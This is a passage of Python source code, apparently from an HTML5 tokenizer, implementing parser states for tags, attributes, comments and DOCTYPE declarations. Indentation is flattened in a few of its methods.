emitted.
"""
token = self.currentToken
# Add token to the queue to be yielded
if (token["type"] in tagTokenTypes):
if self.lowercaseElementName:
token["name"] = token["name"].translate(asciiUpper2Lower)
if token["type"] == tokenTypes["EndTag"]:
if token["data"]:
self.tokenQueue.append({"type":tokenTypes["ParseError"],
"data":"attributes-in-end-tag"})
if token["selfClosing"]:
self.tokenQueue.append({"type":tokenTypes["ParseError"],
"data":"self-closing-flag-on-end-tag"})
self.tokenQueue.append(token)
self.state = self.dataState
# Below are the various tokenizer states worked out.
    def dataState(self):
        """Main text state: emits character tokens and dispatches to the
        entity/tag states, tracking the CDATA/RCDATA escape flag via the
        last four characters seen ("<!--" opens, "-->" closes).
        """
        #XXX - consider splitting this state based on the content model flag
        data = self.stream.char()

        # Keep a charbuffer to handle the escapeFlag
        if (self.contentModelFlag in
            (contentModelFlags["CDATA"], contentModelFlags["RCDATA"])):
            if len(self.lastFourChars) == 4:
                self.lastFourChars.pop(0)
            self.lastFourChars.append(data)

        # The rest of the logic
        if (data == "&" and self.contentModelFlag in
            (contentModelFlags["PCDATA"], contentModelFlags["RCDATA"]) and
            not self.escapeFlag):
            self.state = self.states["entityData"]
        elif (data == "-" and self.contentModelFlag in
              (contentModelFlags["CDATA"], contentModelFlags["RCDATA"]) and
              not self.escapeFlag and "".join(self.lastFourChars) == "<!--"):
            # "<!--" seen inside CDATA/RCDATA: enter escaped mode.
            self.escapeFlag = True
            self.tokenQueue.append({"type": tokenTypes["Characters"],
                                    "data":data})
        elif (data == "<" and (self.contentModelFlag ==
                               contentModelFlags["PCDATA"]
                               or (self.contentModelFlag in
                                   (contentModelFlags["CDATA"],
                                    contentModelFlags["RCDATA"]) and
                                   self.escapeFlag == False))):
            self.state = self.states["tagOpen"]
        elif (data == ">" and self.contentModelFlag in
              (contentModelFlags["CDATA"], contentModelFlags["RCDATA"]) and
              self.escapeFlag and "".join(self.lastFourChars)[1:] == "-->"):
            # "-->" seen: leave escaped mode.
            self.escapeFlag = False
            self.tokenQueue.append({"type": tokenTypes["Characters"], "data":data})
        elif data is EOF:
            # Tokenization ends.
            return False
        elif data in spaceCharacters:
            # Directly after emitting a token you switch back to the "data
            # state". At that point spaceCharacters are important so they are
            # emitted separately.
            self.tokenQueue.append({"type": tokenTypes["SpaceCharacters"], "data":
              data + self.stream.charsUntil(spaceCharacters, True)})
            # No need to update lastFourChars here, since the first space will
            # have already been appended to lastFourChars and will have broken
            # any <!-- or --> sequences
        else:
            if (self.contentModelFlag in
                (contentModelFlags["CDATA"], contentModelFlags["RCDATA"])):
                chars = self.stream.charsUntil((u"&", u"<", u">", u"-"))
                self.lastFourChars += chars[-4:]
                self.lastFourChars = self.lastFourChars[-4:]
            else:
                chars = self.stream.charsUntil((u"&", u"<"))
            self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
              data + chars})
        return True
def entityDataState(self):
self.consumeEntity()
self.state = self.states["data"]
return True
    def tagOpenState(self):
        """Handle the character following "<": start/end tags, markup
        declarations and bogus comments in PCDATA; only "</" is special in
        CDATA/RCDATA.
        """
        data = self.stream.char()
        if self.contentModelFlag == contentModelFlags["PCDATA"]:
            if data == u"!":
                self.state = self.states["markupDeclarationOpen"]
            elif data == u"/":
                self.state = self.states["closeTagOpen"]
            elif data in asciiLetters:
                self.currentToken = {"type": tokenTypes["StartTag"],
                                     "name": data, "data": [],
                                     "selfClosing": False,
                                     "selfClosingAcknowledged": False}
                self.state = self.states["tagName"]
            elif data == u">":
                # XXX In theory it could be something besides a tag name. But
                # do we really care?
                self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
                  "expected-tag-name-but-got-right-bracket"})
                self.tokenQueue.append({"type": tokenTypes["Characters"], "data": u"<>"})
                self.state = self.states["data"]
            elif data == u"?":
                # XXX In theory it could be something besides a tag name. But
                # do we really care?
                self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
                  "expected-tag-name-but-got-question-mark"})
                self.stream.unget(data)
                self.state = self.states["bogusComment"]
            else:
                # XXX
                self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
                  "expected-tag-name"})
                self.tokenQueue.append({"type": tokenTypes["Characters"], "data": u"<"})
                self.stream.unget(data)
                self.state = self.states["data"]
        else:
            # We know the content model flag is set to either RCDATA or CDATA
            # now because this state can never be entered with the PLAINTEXT
            # flag.
            if data == u"/":
                self.state = self.states["closeTagOpen"]
            else:
                # Anything else: "<" was literal text.
                self.tokenQueue.append({"type": tokenTypes["Characters"], "data": u"<"})
                self.stream.unget(data)
                self.state = self.states["data"]
        return True
    def closeTagOpenState(self):
        """Handle "</": in RCDATA/CDATA only a closing tag matching the last
        emitted start tag switches back to PCDATA; otherwise build an end-tag
        token, or fall back to errors/bogus comments.
        """
        if (self.contentModelFlag in (contentModelFlags["RCDATA"],
                                      contentModelFlags["CDATA"])):
            charStack = []
            if self.currentToken:
                # So far we know that "</" has been consumed. We now need to know
                # whether the next few characters match the name of last emitted
                # start tag which also happens to be the currentToken.
                matched = True
                for expected in self.currentToken["name"].lower():
                    charStack.append(self.stream.char())
                    if charStack[-1] not in (expected, expected.upper()):
                        matched = False
                        break
                # If the tag name prefix matched, we also need to check the
                # subsequent character
                if matched:
                    charStack.append(self.stream.char())
                    if charStack[-1] in (spaceCharacters | frozenset((u">", u"/", EOF))):
                        self.contentModelFlag = contentModelFlags["PCDATA"]
                        # Unget the last character, so it can be re-processed
                        # in the next state
                        self.stream.unget(charStack.pop())
                        # The remaining characters in charStack are the tag name
                        self.currentToken = {"type": tokenTypes["EndTag"],
                                             "name": u"".join(charStack),
                                             "data": [],
                                             "selfClosing":False}
                        self.state = self.states["tagName"]
                        return True
            # Didn't find the end tag. The last character in charStack could be
            # anything, so it has to be re-processed in the data state
            self.stream.unget(charStack.pop())
            # The remaining characters are a prefix of the tag name, so they're
            # just letters and digits, so they can be output as character
            # tokens immediately
            self.tokenQueue.append({"type": tokenTypes["Characters"], "data": u"</" + u"".join(charStack)})
            self.state = self.states["data"]
            return True
        data = self.stream.char()
        if data in asciiLetters:
            self.currentToken = {"type": tokenTypes["EndTag"], "name": data,
                                 "data": [], "selfClosing":False}
            self.state = self.states["tagName"]
        elif data == u">":
            self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
              "expected-closing-tag-but-got-right-bracket"})
            self.state = self.states["data"]
        elif data is EOF:
            self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
              "expected-closing-tag-but-got-eof"})
            # Emit the "</" that was consumed as literal text.
            self.tokenQueue.append({"type": tokenTypes["Characters"], "data": u"</"})
            self.state = self.states["data"]
        else:
            # XXX data can be _'_...
            self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
              "expected-closing-tag-but-got-char",
              "datavars": {"data": data}})
            self.stream.unget(data)
            self.state = self.states["bogusComment"]
        return True
def tagNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.states["beforeAttributeName"]
elif data == u">":
self.emitCurrentToken()
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-tag-name"})
self.state = self.states["data"]
elif data == u"/":
self.state = self.states["selfClosingStartTag"]
else:
self.currentToken["name"] += data
# (Don't use charsUntil here, because tag names are
# very short and it's faster to not do anything fancy)
return True
    def beforeAttributeNameState(self):
        """Skip whitespace before an attribute name, then start a new
        [name, value] pair on the current token (quotes and "=" here are
        parse errors but still begin an attribute).
        """
        data = self.stream.char()
        if data in spaceCharacters:
            self.stream.charsUntil(spaceCharacters, True)
        elif data in asciiLetters:
            self.currentToken["data"].append([data, ""])
            self.state = self.states["attributeName"]
        elif data == u">":
            self.emitCurrentToken()
        elif data == u"/":
            self.state = self.states["selfClosingStartTag"]
        elif data == u"'" or data == u'"' or data == u"=":
            self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
              "invalid-character-in-attribute-name"})
            self.currentToken["data"].append([data, ""])
            self.state = self.states["attributeName"]
        elif data is EOF:
            self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
              "expected-attribute-name-but-got-eof"})
            self.state = self.states["data"]
        else:
            self.currentToken["data"].append([data, ""])
            self.state = self.states["attributeName"]
        return True
    def attributeNameState(self):
        """Accumulate the current attribute's name; on leaving the state,
        lowercase it (when configured) and report duplicate attribute names.
        """
        data = self.stream.char()
        leavingThisState = True
        emitToken = False
        if data == u"=":
            self.state = self.states["beforeAttributeValue"]
        elif data in asciiLetters:
            self.currentToken["data"][-1][0] += data +\
              self.stream.charsUntil(asciiLetters, True)
            leavingThisState = False
        elif data == u">":
            # XXX If we emit here the attributes are converted to a dict
            # without being checked and when the code below runs we error
            # because data is a dict not a list
            emitToken = True
        elif data in spaceCharacters:
            self.state = self.states["afterAttributeName"]
        elif data == u"/":
            self.state = self.states["selfClosingStartTag"]
        elif data == u"'" or data == u'"':
            self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
              "invalid-character-in-attribute-name"})
            self.currentToken["data"][-1][0] += data
            leavingThisState = False
        elif data is EOF:
            self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
              "eof-in-attribute-name"})
            self.state = self.states["data"]
            emitToken = True
        else:
            self.currentToken["data"][-1][0] += data
            leavingThisState = False

        if leavingThisState:
            # Attributes are not dropped at this stage. That happens when the
            # start tag token is emitted so values can still be safely appended
            # to attributes, but we do want to report the parse error in time.
            if self.lowercaseAttrName:
                self.currentToken["data"][-1][0] = (
                    self.currentToken["data"][-1][0].translate(asciiUpper2Lower))
            for name, value in self.currentToken["data"][:-1]:
                if self.currentToken["data"][-1][0] == name:
                    self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
                      "duplicate-attribute"})
                    break
            # XXX Fix for above XXX
            if emitToken:
                self.emitCurrentToken()
        return True
def afterAttributeNameState(self):
    """Tokenizer state: after an attribute name, expecting '=', '>', '/',
    whitespace, or the start of a new attribute."""
    data = self.stream.char()
    if data in spaceCharacters:
        # Skip any remaining run of whitespace in one call.
        self.stream.charsUntil(spaceCharacters, True)
    elif data == u"=":
        self.state = self.states["beforeAttributeValue"]
    elif data == u">":
        self.emitCurrentToken()
    elif data in asciiLetters:
        # Previous attribute had no value; start a fresh [name, value] pair.
        self.currentToken["data"].append([data, ""])
        self.state = self.states["attributeName"]
    elif data == u"/":
        self.state = self.states["selfClosingStartTag"]
    elif data == u"'" or data == u'"':
        # Quote characters here are a parse error but still begin a new name.
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "invalid-character-after-attribute-name"})
        self.currentToken["data"].append([data, ""])
        self.state = self.states["attributeName"]
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "expected-end-of-tag-but-got-eof"})
        self.emitCurrentToken()
    else:
        self.currentToken["data"].append([data, ""])
        self.state = self.states["attributeName"]
    return True
def beforeAttributeValueState(self):
    """Tokenizer state: just after '=', decide how the value is quoted."""
    data = self.stream.char()
    if data in spaceCharacters:
        self.stream.charsUntil(spaceCharacters, True)
    elif data == u"\"":
        self.state = self.states["attributeValueDoubleQuoted"]
    elif data == u"&":
        # '&' starts an unquoted value; push it back so the unquoted state
        # can run its entity handling on it.
        self.state = self.states["attributeValueUnQuoted"]
        self.stream.unget(data);
    elif data == u"'":
        self.state = self.states["attributeValueSingleQuoted"]
    elif data == u">":
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "expected-attribute-value-but-got-right-bracket"})
        self.emitCurrentToken()
    elif data == u"=":
        # '=' here is an error but is kept as part of the unquoted value.
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "equals-in-unquoted-attribute-value"})
        self.currentToken["data"][-1][1] += data
        self.state = self.states["attributeValueUnQuoted"]
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "expected-attribute-value-but-got-eof"})
        self.emitCurrentToken()
    else:
        self.currentToken["data"][-1][1] += data
        self.state = self.states["attributeValueUnQuoted"]
    return True
def attributeValueDoubleQuotedState(self):
    """Tokenizer state: inside a double-quoted attribute value."""
    data = self.stream.char()
    if data == "\"":
        self.state = self.states["afterAttributeValue"]
    elif data == u"&":
        # Entity handling; '"' is the allowed-char terminator for the entity.
        self.processEntityInAttribute(u'"')
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "eof-in-attribute-value-double-quote"})
        self.emitCurrentToken()
    else:
        # Consume up to the next closing quote or entity start in one call.
        self.currentToken["data"][-1][1] += data +\
            self.stream.charsUntil(("\"", u"&"))
    return True
def attributeValueSingleQuotedState(self):
    """Tokenizer state: inside a single-quoted attribute value."""
    data = self.stream.char()
    if data == "'":
        self.state = self.states["afterAttributeValue"]
    elif data == u"&":
        # Entity handling; "'" is the allowed-char terminator for the entity.
        self.processEntityInAttribute(u"'")
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "eof-in-attribute-value-single-quote"})
        self.emitCurrentToken()
    else:
        # Consume up to the next closing quote or entity start in one call.
        self.currentToken["data"][-1][1] += data +\
            self.stream.charsUntil(("'", u"&"))
    return True
def attributeValueUnQuotedState(self):
    """Tokenizer state: inside an unquoted attribute value."""
    data = self.stream.char()
    if data in spaceCharacters:
        self.state = self.states["beforeAttributeName"]
    elif data == u"&":
        # No quote terminator for entities in an unquoted value.
        self.processEntityInAttribute(None)
    elif data == u">":
        self.emitCurrentToken()
    elif data in (u'"', u"'", u"=", u"<"):
        # These characters are parse errors here but are kept in the value.
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "unexpected-character-in-unquoted-attribute-value"})
        self.currentToken["data"][-1][1] += data
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "eof-in-attribute-value-no-quotes"})
        self.emitCurrentToken()
    else:
        # Bulk-consume until any character that ends or interrupts the value.
        self.currentToken["data"][-1][1] += data + self.stream.charsUntil( \
            frozenset(("&", ">", "<", "=", "'", '"')) | spaceCharacters)
    return True
def afterAttributeValueState(self):
    """Tokenizer state: just after a quoted attribute value closed."""
    data = self.stream.char()
    if data in spaceCharacters:
        self.state = self.states["beforeAttributeName"]
    elif data == u">":
        self.emitCurrentToken()
    elif data == u"/":
        self.state = self.states["selfClosingStartTag"]
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "unexpected-EOF-after-attribute-value"})
        self.emitCurrentToken()
        # NOTE(review): the unget/state assignment below runs after the token
        # has already been emitted — confirm this ordering is intentional.
        self.stream.unget(data)
        self.state = self.states["data"]
    else:
        # Reprocess the unexpected character as a new attribute name.
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "unexpected-character-after-attribute-value"})
        self.stream.unget(data)
        self.state = self.states["beforeAttributeName"]
    return True
def selfClosingStartTagState(self):
    """Tokenizer state: after '/' inside a tag, expecting '>'."""
    data = self.stream.char()
    if data == ">":
        self.currentToken["selfClosing"] = True
        self.emitCurrentToken()
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"],
                                "data":
                                "unexpected-EOF-after-solidus-in-tag"})
        self.stream.unget(data)
        self.state = self.states["data"]
    else:
        # NOTE(review): "soldius" below looks like a typo for "solidus", but
        # this string is an error-code key looked up elsewhere — do not change
        # it without updating the matching error-message table.
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "unexpected-character-after-soldius-in-tag"})
        self.stream.unget(data)
        self.state = self.states["beforeAttributeName"]
    return True
def bogusCommentState(self):
    """Tokenizer state: emit everything up to the next '>' as a comment."""
    # Make a new comment token and give it as value all the characters
    # until the first > or EOF (charsUntil checks for EOF automatically)
    # and emit it.
    self.tokenQueue.append(
        {"type": tokenTypes["Comment"], "data": self.stream.charsUntil(u">")})
    # Eat the character directly after the bogus comment which is either a
    # ">" or an EOF.
    self.stream.char()
    self.state = self.states["data"]
    return True
def bogusCommentContinuationState(self):
    """Continue a bogus comment whose token was created by the caller."""
    # Like bogusCommentState, but the caller must create the comment token
    # and this state just adds more characters to it
    self.currentToken["data"] += self.stream.charsUntil(u">")
    self.tokenQueue.append(self.currentToken)
    # Eat the character directly after the bogus comment which is either a
    # ">" or an EOF.
    self.stream.char()
    self.state = self.states["data"]
    return True
def markupDeclarationOpenState(self):
    """Tokenizer state: after '<!', dispatch to comment, DOCTYPE, or a
    bogus comment depending on what follows."""
    charStack = [self.stream.char()]
    if charStack[-1] == u"-":
        charStack.append(self.stream.char())
        if charStack[-1] == u"-":
            # "<!--": start a real comment token.
            self.currentToken = {"type": tokenTypes["Comment"], "data": u""}
            self.state = self.states["commentStart"]
            return True
    elif charStack[-1] in (u'd', u'D'):
        # Case-insensitively match the remaining letters of "DOCTYPE".
        matched = True
        for expected in ((u'o', u'O'), (u'c', u'C'), (u't', u'T'),
                         (u'y', u'Y'), (u'p', u'P'), (u'e', u'E')):
            charStack.append(self.stream.char())
            if charStack[-1] not in expected:
                matched = False
                break
        if matched:
            self.currentToken = {"type": tokenTypes["Doctype"],
                                 "name": u"",
                                 "publicId": None, "systemId": None,
                                 "correct": True}
            self.state = self.states["doctype"]
            return True
    self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
        "expected-dashes-or-doctype"})
    # charStack[:-2] consists of 'safe' characters ('-', 'd', 'o', etc)
    # so they can be copied directly into the bogus comment data, and only
    # the last character might be '>' or EOF and needs to be ungetted
    self.stream.unget(charStack.pop())
    self.currentToken = {"type": tokenTypes["Comment"],
                         "data": u"".join(charStack)}
    self.state = self.states["bogusCommentContinuation"]
    return True
def commentStartState(self):
    """Tokenizer state: just after '<!--'."""
    data = self.stream.char()
    if data == "-":
        self.state = self.states["commentStartDash"]
    elif data == ">":
        # "<!-->" — empty, incorrect comment.
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "incorrect-comment"})
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "eof-in-comment"})
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    else:
        # Bulk-consume comment text until the next '-'.
        self.currentToken["data"] += data + self.stream.charsUntil(u"-")
        self.state = self.states["comment"]
    return True
def commentStartDashState(self):
    """Tokenizer state: after '<!---' (one dash into the comment body)."""
    data = self.stream.char()
    if data == "-":
        self.state = self.states["commentEnd"]
    elif data == ">":
        # "<!--->" — incorrect comment.
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "incorrect-comment"})
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "eof-in-comment"})
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    else:
        # The pending single dash becomes part of the comment data.
        self.currentToken["data"] += "-" + data + self.stream.charsUntil(u"-")
        self.state = self.states["comment"]
    return True
def commentState(self):
    """Tokenizer state: inside a comment body."""
    data = self.stream.char()
    if data == u"-":
        self.state = self.states["commentEndDash"]
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "eof-in-comment"})
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    else:
        # Bulk-consume comment text until the next '-'.
        self.currentToken["data"] += data + self.stream.charsUntil(u"-")
    return True
def commentEndDashState(self):
    """Tokenizer state: one '-' seen inside a comment; a second ends it."""
    data = self.stream.char()
    if data == u"-":
        self.state = self.states["commentEnd"]
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "eof-in-comment-end-dash"})
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    else:
        # Lone dash is comment content after all.
        self.currentToken["data"] += u"-" + data +\
            self.stream.charsUntil(u"-")
        # Consume the next character which is either a "-" or an EOF as
        # well so if there's a "-" directly after the "-" we go nicely to
        # the "comment end state" without emitting a ParseError() there.
        self.stream.char()
    return True
def commentEndState(self):
    """Tokenizer state: after '--' inside a comment, expecting '>'."""
    data = self.stream.char()
    if data == u">":
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    elif data == u"-":
        # "--- ..." — extra dash becomes data, stay in this state.
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "unexpected-dash-after-double-dash-in-comment"})
        self.currentToken["data"] += data
    elif data in spaceCharacters:
        self.currentToken["data"] += "--" + data
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "unexpected-space-after-double-dash-in-comment"})
        self.state = self.states["commentEndSpace"]
    elif data == "!":
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "unexpected-bang-after-double-dash-in-comment"})
        self.state = self.states["commentEndBang"]
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "eof-in-comment-double-dash"})
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    else:
        # XXX
        # Any other character re-opens the comment; the '--' is kept as data.
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "unexpected-char-in-comment"})
        self.currentToken["data"] += u"--" + data
        self.state = self.states["comment"]
    return True
def commentEndBangState(self):
    """Tokenizer state: after '--!' inside a comment."""
    data = self.stream.char()
    if data == u">":
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    elif data == u"-":
        # '--!-' — keep the literal '--!' as data and retry for comment end.
        self.currentToken["data"] += "--!"
        self.state = self.states["commentEndDash"]
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "eof-in-comment-end-bang-state"})
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    else:
        self.currentToken["data"] += u"--!" + data
        self.state = self.states["comment"]
    return True
def commentEndSpaceState(self):
    """Tokenizer state: whitespace after '--' inside a comment."""
    data = self.stream.char()
    if data == u">":
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    elif data == u"-":
        self.state = self.states["commentEndDash"]
    elif data in spaceCharacters:
        # Further whitespace accumulates into the comment data.
        self.currentToken["data"] += data
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "eof-in-comment-end-space-state"})
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    else:
        self.currentToken["data"] += data
        self.state = self.states["comment"]
    return True
def doctypeState(self):
    """Tokenizer state: just after '<!DOCTYPE', expecting whitespace."""
    data = self.stream.char()
    if data in spaceCharacters:
        self.state = self.states["beforeDoctypeName"]
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "expected-doctype-name-but-got-eof"})
        self.currentToken["correct"] = False
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    else:
        # Missing whitespace is an error; reprocess the char as the name.
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "need-space-after-doctype"})
        self.stream.unget(data)
        self.state = self.states["beforeDoctypeName"]
    return True
def beforeDoctypeNameState(self):
    """Tokenizer state: skip whitespace before the DOCTYPE name."""
    data = self.stream.char()
    if data in spaceCharacters:
        pass
    elif data == u">":
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "expected-doctype-name-but-got-right-bracket"})
        self.currentToken["correct"] = False
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "expected-doctype-name-but-got-eof"})
        self.currentToken["correct"] = False
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    else:
        # First character of the DOCTYPE name.
        self.currentToken["name"] = data
        self.state = self.states["doctypeName"]
    return True
def doctypeNameState(self):
    """Tokenizer state: consume the DOCTYPE name (lowercased on exit)."""
    data = self.stream.char()
    if data in spaceCharacters:
        self.currentToken["name"] = self.currentToken["name"].translate(asciiUpper2Lower)
        self.state = self.states["afterDoctypeName"]
    elif data == u">":
        self.currentToken["name"] = self.currentToken["name"].translate(asciiUpper2Lower)
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "eof-in-doctype-name"})
        self.currentToken["correct"] = False
        self.currentToken["name"] = self.currentToken["name"].translate(asciiUpper2Lower)
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    else:
        self.currentToken["name"] += data
    return True
def afterDoctypeNameState(self):
    """Tokenizer state: after the DOCTYPE name; matches the PUBLIC or
    SYSTEM keyword case-insensitively, otherwise enters bogus doctype."""
    data = self.stream.char()
    if data in spaceCharacters:
        pass
    elif data == u">":
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    elif data is EOF:
        self.currentToken["correct"] = False
        self.stream.unget(data)
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "eof-in-doctype"})
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    else:
        if data in (u"p", u"P"):
            # Try to match the rest of "PUBLIC".
            matched = True
            for expected in ((u"u", u"U"), (u"b", u"B"), (u"l", u"L"),
                             (u"i", u"I"), (u"c", u"C")):
                data = self.stream.char()
                if data not in expected:
                    matched = False
                    break
            if matched:
                self.state = self.states["beforeDoctypePublicIdentifier"]
                return True
        elif data in (u"s", u"S"):
            # Try to match the rest of "SYSTEM".
            matched = True
            for expected in ((u"y", u"Y"), (u"s", u"S"), (u"t", u"T"),
                             (u"e", u"E"), (u"m", u"M")):
                data = self.stream.char()
                if data not in expected:
                    matched = False
                    break
            if matched:
                self.state = self.states["beforeDoctypeSystemIdentifier"]
                return True
        # All the characters read before the current 'data' will be
        # [a-zA-Z], so they're garbage in the bogus doctype and can be
        # discarded; only the latest character might be '>' or EOF
        # and needs to be ungetted
        self.stream.unget(data)
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "expected-space-or-right-bracket-in-doctype", "datavars":
            {"data": data}})
        self.currentToken["correct"] = False
        self.state = self.states["bogusDoctype"]
    return True
def beforeDoctypePublicIdentifierState(self):
    """Tokenizer state: after the PUBLIC keyword, expecting a quote."""
    data = self.stream.char()
    if data in spaceCharacters:
        pass
    elif data == "\"":
        self.currentToken["publicId"] = u""
        self.state = self.states["doctypePublicIdentifierDoubleQuoted"]
    elif data == "'":
        self.currentToken["publicId"] = u""
        self.state = self.states["doctypePublicIdentifierSingleQuoted"]
    elif data == ">":
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "unexpected-end-of-doctype"})
        self.currentToken["correct"] = False
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "eof-in-doctype"})
        self.currentToken["correct"] = False
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    else:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "unexpected-char-in-doctype"})
        self.currentToken["correct"] = False
        self.state = self.states["bogusDoctype"]
    return True
def doctypePublicIdentifierDoubleQuotedState(self):
    """Tokenizer state: inside a double-quoted DOCTYPE public identifier."""
    data = self.stream.char()
    if data == "\"":
        self.state = self.states["afterDoctypePublicIdentifier"]
    elif data == ">":
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "unexpected-end-of-doctype"})
        self.currentToken["correct"] = False
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "eof-in-doctype"})
        self.currentToken["correct"] = False
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    else:
        self.currentToken["publicId"] += data
    return True
def doctypePublicIdentifierSingleQuotedState(self):
    """Tokenizer state: inside a single-quoted DOCTYPE public identifier."""
    data = self.stream.char()
    if data == "'":
        self.state = self.states["afterDoctypePublicIdentifier"]
    elif data == ">":
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "unexpected-end-of-doctype"})
        self.currentToken["correct"] = False
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "eof-in-doctype"})
        self.currentToken["correct"] = False
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    else:
        self.currentToken["publicId"] += data
    return True
def afterDoctypePublicIdentifierState(self):
    """Tokenizer state: after a public identifier; an optional system
    identifier may follow."""
    data = self.stream.char()
    if data in spaceCharacters:
        pass
    elif data == "\"":
        self.currentToken["systemId"] = u""
        self.state = self.states["doctypeSystemIdentifierDoubleQuoted"]
    elif data == "'":
        self.currentToken["systemId"] = u""
        self.state = self.states["doctypeSystemIdentifierSingleQuoted"]
    elif data == ">":
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "eof-in-doctype"})
        self.currentToken["correct"] = False
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    else:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "unexpected-char-in-doctype"})
        self.currentToken["correct"] = False
        self.state = self.states["bogusDoctype"]
    return True
def beforeDoctypeSystemIdentifierState(self):
    """Tokenizer state: after the SYSTEM keyword, expecting a quote."""
    data = self.stream.char()
    if data in spaceCharacters:
        pass
    elif data == "\"":
        self.currentToken["systemId"] = u""
        self.state = self.states["doctypeSystemIdentifierDoubleQuoted"]
    elif data == "'":
        self.currentToken["systemId"] = u""
        self.state = self.states["doctypeSystemIdentifierSingleQuoted"]
    elif data == ">":
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "unexpected-char-in-doctype"})
        self.currentToken["correct"] = False
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "eof-in-doctype"})
